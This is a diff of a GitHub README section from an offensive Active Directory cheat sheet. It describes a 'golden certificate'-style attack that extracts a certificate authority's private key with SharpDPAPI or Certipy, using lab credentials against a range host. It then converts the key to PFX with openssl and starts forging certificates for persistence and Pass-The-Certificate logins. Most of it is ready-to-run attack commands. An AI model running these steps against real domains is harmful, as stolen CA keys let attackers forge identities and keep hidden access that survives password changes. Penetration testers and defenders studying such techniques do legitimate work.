aniqfakhrul/archives/README.md

 The title is basically self explanatory, this attack is pretty much the same as golden certificate where you forge a certificate offline with a compromised private key on a CA server *(Having system access on a CA)*.
 Therefore, it can be used to forge a certificate and sign it with the private key to be used later on for persistence purposes.
 A certificate will normally valid up until 1 year duration.
 1. Extract private key from CA
 ```
+# SharpDPAPI
 SharpDPAPI.exe certificates /machine

+# Certipy
+certipy ca -u 'localadmin' -p 'Password1234' -backup -target ca01.range.net -ca 'range-CA01-CA'
 ```
-2. Copy the cert into a .pem file and convert to a usable format (.pfx) to perform [Pass-The-Certificate](#pass-the-certificate) attack. *Note that this will require a user defined password*
+2. *If Certipy is used in step 1, you can skip this step*.
+Copy the cert into a .pem file and convert to a usable format (.pfx) to perform [Pass-The-Certificate](#pass-the-certificate) attack. *Note that this will require a user defined password*
 ```
 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 ```
 3. Forge a certificate
 ```
-# certipy
+# certipy (this step is unnecessary if you used certipy in step 1)
 1. convert pfx to a certipy usable cert (no password)
 certipy cert -export -pfx cert.pfx -password admin -out final.pfx